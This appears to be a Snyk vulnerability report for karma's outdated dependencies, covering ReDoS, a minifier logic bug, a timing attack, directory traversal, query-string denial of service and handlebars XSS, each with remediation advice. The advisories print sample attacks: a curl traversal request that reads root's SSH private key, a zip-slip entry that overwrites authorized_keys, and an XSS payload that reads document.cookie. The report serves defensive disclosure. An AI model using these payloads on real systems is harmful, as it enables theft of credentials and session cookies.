Upgrade send to version 0.11.1 or higher. If a direct dependency update is not possible, use snyk wizard to patch this vulnerability.

References

Fixed in 0.13.0-rc.1

Regular Expression Denial of Service (DoS)

medium severity

Detailed paths

  • Introduced through: karma@0.13.0-rc.0 > socket.io@0.9.16 > socket.io-client@0.9.16 > uglify-js@1.2.5

Overview

The parse() function in the uglify-js package prior to version 2.6.0 is vulnerable to regular expression denial of service (ReDoS) attacks when long inputs of certain patterns are processed.

Denial of Service (DoS) describes a family of attacks, all aimed at making a system inaccessible to its original and legitimate users. There are many types of DoS attacks, ranging from trying to clog the network pipes to the system by generating a large volume of traffic from many machines (a Distributed Denial of Service - DDoS - attack) to sending crafted requests that cause a system to crash or take a disproportional amount of time to process.

The Regular expression Denial of Service (ReDoS) is a type of Denial of Service attack. Regular expressions are incredibly powerful, but they aren't very intuitive and can ultimately end up making it easy for attackers to take your site down.

Let’s take the following regular expression as an example:

regex = /A(B|C+)+D/

This regular expression accomplishes the following:

  • A The string must start with the letter 'A'
  • (B|C+)+ The string must then follow the letter A with either the letter 'B' or some number of occurrences of the letter 'C' (the + matches one or more times). The + at the end of this section states that we can look for one or more matches of this section.
  • D Finally, we ensure this section of the string ends with a 'D'

The expression would match inputs such as ABBD, ABCCCCD, ABCBCCCD and ACCCCCD

It most cases, it doesn't take very long for a regex engine to find a match:

$ time node -e '/A(B|C+)+D/.test("ACCCCCCCCCCCCCCCCCCCCCCCCCCCCD")'
0.04s user 0.01s system 95% cpu 0.052 total

$ time node -e '/A(B|C+)+D/.test("ACCCCCCCCCCCCCCCCCCCCCCCCCCCCX")'
1.79s user 0.02s system 99% cpu 1.812 total

The entire process of testing it against a 30 characters long string takes around ~52ms. But when given an invalid string, it takes nearly two seconds to complete the test, over ten times as long as it took to test a valid string. The dramatic difference is due to the way regular expressions get evaluated.

Most Regex engines will work very similarly (with minor differences). The engine will match the first possible way to accept the current character and proceed to the next one. If it then fails to match the next one, it will backtrack and see if there was another way to digest the previous character. If it goes too far down the rabbit hole only to find out the string doesn’t match in the end, and if many characters have multiple valid regex paths, the number of backtracking steps can become very large, resulting in what is known as catastrophic backtracking.

Let's look at how our expression runs into this problem, using a shorter string: "ACCCX". While it seems fairly straightforward, there are still four different ways that the engine could match those three C's:

  1. CCC
  2. CC+C
  3. C+CC
  4. C+C+C.

The engine has to try each of those combinations to see if any of them potentially match against the expression. When you combine that with the other steps the engine must take, we can use RegEx 101 debugger to see the engine has to take a total of 38 steps before it can determine the string doesn't match.

From there, the number of steps the engine must use to validate a string just continues to grow.

String Number of C's Number of steps
ACCCX 3 38
ACCCCX 4 71
ACCCCCX 5 136
ACCCCCCCCCCCCCCX 14 65,553

By the time the string includes 14 C's, the engine has to take over 65,000 steps just to see if the string is valid. These extreme situations can cause them to work very slowly (exponentially related to input size, as shown above), allowing an attacker to exploit this and can cause the service to excessively consume CPU, resulting in a Denial of Service.

Remediation

Upgrade to version 2.6.0 or greater. If a direct dependency update is not possible, use snyk wizard to patch this vulnerability.

References

Improper minification of non-boolean comparisons

high severity

Detailed paths

  • Introduced through: karma@0.13.0-rc.0 > socket.io@0.9.16 > socket.io-client@0.9.16 > uglify-js@1.2.5

Overview

uglify-js is a JavaScript parser, minifier, compressor and beautifier toolkit.

Tom MacWright discovered that UglifyJS versions 2.4.23 and earlier are affected by a vulnerability which allows a specially crafted Javascript file to have altered functionality after minification. This bug was demonstrated by Yan to allow potentially malicious code to be hidden within secure code, activated by minification.

Details

In Boolean algebra, DeMorgan's laws describe the relationships between conjunctions (&&), disjunctions (||) and negations (!). In Javascript form, they state that:

 !(a && b) === (!a) || (!b)
 !(a || b) === (!a) && (!b)

The law does not hold true when one of the values is not a boolean however.

Vulnerable versions of UglifyJS do not account for this restriction, and erroneously apply the laws to a statement if it can be reduced in length by it.

Consider this authentication function:

function isTokenValid(user) {
    var timeLeft =
        !!config && // config object exists
        !!user.token && // user object has a token
        !user.token.invalidated && // token is not explicitly invalidated
        !config.uninitialized && // config is initialized
        !config.ignoreTimestamps && // don't ignore timestamps
        getTimeLeft(user.token.expiry); // > 0 if expiration is in the future

    // The token must not be expired
    return timeLeft > 0;
}

function getTimeLeft(expiry) {
  return expiry - getSystemTime();
}

When minified with a vulnerable version of UglifyJS, it will produce the following insecure output, where a token will never expire:

( Formatted for readability )

function isTokenValid(user) {
    var timeLeft = !(                       // negation
        !config                             // config object does not exist
        || !user.token                      // user object does not have a token
        || user.token.invalidated           // token is explicitly invalidated
        || config.uninitialized             // config isn't initialized
        || config.ignoreTimestamps          // ignore timestamps
        || !getTimeLeft(user.token.expiry)  // > 0 if expiration is in the future
    );
    return timeLeft > 0
}

function getTimeLeft(expiry) {
    return expiry - getSystemTime()
}

Remediation

Upgrade UglifyJS to version 2.4.24 or higher.

References

Fixed in 0.12.25

Non-Constant Time String Comparison

medium severity
  • Vulnerable module: cookie-signature
  • Introduced through: connect@2.12.0

Detailed paths

  • Introduced through: karma@0.12.24-dev-test > connect@2.12.0 > cookie-signature@1.0.1

Overview

'cookie-signature' is a library for signing cookies.

Versions before 1.0.4 of the library use the built-in string comparison mechanism, ===, and not a time constant string comparison. As a result, the comparison will fail faster when the first characters in the token are incorrect. An attacker can use this difference to perform a timing attack, essentially allowing them to guess the secret one character at a time.

You can read more about timing attacks in Node.js on the Snyk blog: https://snyk.io/blog/node-js-timing-attack-ccc-ctf/

Remediation

Upgrade to 1.0.4 or greater.

References

Directory Traversal

medium severity

Detailed paths

  • Introduced through: karma@0.12.24-dev-test > connect@2.12.0 > send@0.1.4

Overview

send is a library for streaming files from the file system.

Affected versions of this package are vulnerable to Directory-Traversal attacks due to insecure comparison. When relying on the root option to restrict file access a malicious user may escape out of the restricted directory and access files in a similarly named directory. For example, a path like /my-secret is consedered fine for the root /my.

Details

A Directory Traversal attack (also known as path traversal) aims to access files and directories that are stored outside the intended folder. By manipulating files with “dot-dot-slash (../)” sequences and its variations, or by using absolute file paths, it may be possible to access arbitrary files and directories stored on file system, including application source code, configuration, and other critical system files.

Directory Traversal vulnerabilities can be generally divided into two types:

  • Information Disclosure: Allows the attacker to gain information about the folder structure or read the contents of sensitive files on the system.

st is a module for serving static files on web pages, and contains a vulnerability of this type. In our example, we will serve files from the public route.

If an attacker requests the following URL from our server, it will in turn leak the sensitive private key of the root user.

curl http://localhost:8080/public/%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/root/.ssh/id_rsa

Note %2e is the URL encoded version of . (dot).

  • Writing arbitrary files: Allows the attacker to create or replace existing files. This type of vulnerability is also known as Zip-Slip.

One way to achieve this is by using a malicious zip archive that holds path traversal filenames. When each filename in the zip archive gets concatenated to the target extraction folder, without validation, the final path ends up outside of the target folder. If an executable or a configuration file is overwritten with a file containing malicious code, the problem can turn into an arbitrary code execution issue quite easily.

The following is an example of a zip archive with one benign file and one malicious file. Extracting the malicious file will result in traversing out of the target folder, ending up in /root/.ssh/ overwriting the authorized_keys file:

2018-04-15 22:04:29 .....           19           19  good.txt
2018-04-15 22:04:42 .....           20           20  ../../../../../../root/.ssh/authorized_keys

Remediation

Upgrade to a version greater than or equal to 0.8.4.

References

Denial of Service (Event Loop Blocking)

medium severity

Detailed paths

  • Introduced through: karma@0.12.24-dev-test > connect@2.12.0 > qs@0.6.6

Overview

qs is a querystring parser that supports nesting and arrays, with a depth limit.

Affected versions of this package are vulnerable to Denial of Service (DoS). When parsing a string representing a deeply nested object, qs will block the event loop for long periods of time. Such a delay may hold up the server's resources, keeping it from processing other requests in the meantime, thus enabling a Denial-of-Service attack.

Remediation

Update qs to version 1.0.0 or higher. In these versions, qs enforces a max object depth (along with other limits), limiting the event loop length and thus preventing such an attack.

References

Denial of Service (Memory Exhaustion)

high severity

Detailed paths

  • Introduced through: karma@0.12.24-dev-test > connect@2.12.0 > qs@0.6.6

Overview

qs is a querystring parser that supports nesting and arrays, with a depth limit.

Affected versions of this package are vulnerable to Denial of Service (Dos) attacks. During parsing, the qs module may create a sparse area (an array where no elements are filled), and grow that array to the necessary size based on the indices used on it. An attacker can specify a high index value in a query string, thus making the server allocate a respectively big array. Truly large values can cause the server to run out of memory and cause it to crash - thus enabling a Denial-of-Service attack.

Remediation

Upgrade qs to version 1.0.0 or greater. In these versions, qs introduced a low limit on the index value, preventing such an attack

References

Fixed in 0.9.0

Cross-site Scripting (XSS)

medium severity

Detailed paths

  • Introduced through: karma@0.8.8 > istanbul@0.1.46 > handlebars@1.0.12

Overview

handlebars provides the power necessary to let you build semantic templates.

When using attributes without quotes in a handlebars template, an attacker can manipulate the input to introduce additional attributes, potentially executing code. This may lead to a Cross-site Scripting (XSS) vulnerability, assuming an attacker can influence the value entered into the template. If the handlebars template is used to render user-generated content, this vulnerability may escalate to a persistent XSS vulnerability.

Details

Cross-Site Scripting (XSS) attacks occur when an attacker tricks a user’s browser to execute malicious JavaScript code in the context of a victim’s domain. Such scripts can steal the user’s session cookies for the domain, scrape or modify its content, and perform or modify actions on the user’s behalf, actions typically blocked by the browser’s Same Origin Policy.

These attacks are possible by escaping the context of the web application and injecting malicious scripts in an otherwise trusted website. These scripts can introduce additional attributes (say, a "new" option in a dropdown list or a new link to a malicious site) and can potentially execute code on the clients side, unbeknown to the victim. This occurs when characters like \< > \" \' are not escaped properly.

There are a few types of XSS:

  • Persistent XSS is an attack in which the malicious code persists into the web app’s database.
  • Reflected XSS is an which the website echoes back a portion of the request. The attacker needs to trick the user into clicking a malicious link (for instance through a phishing email or malicious JS on another page), which triggers the XSS attack.
  • DOM-based XSS is an that occurs purely in the browser when client-side JavaScript echoes back a portion of the URL onto the page. DOM-Based XSS is notoriously hard to detect, as the server never gets a chance to see the attack taking place.

Example:

Assume handlebars was used to display user comments and avatar, using the following template: <img src={{avatarUrl}}><pre>{{comment}}</pre>

If an attacker spoofed their avatar URL and provided the following value: http://evil.org/avatar.png onload=alert(document.cookie)

The resulting HTML would be the following, triggering the script once the image loads: <img src=http://evil.org/avatar.png onload=alert(document.cookie)><pre>Gotcha!</pre>

References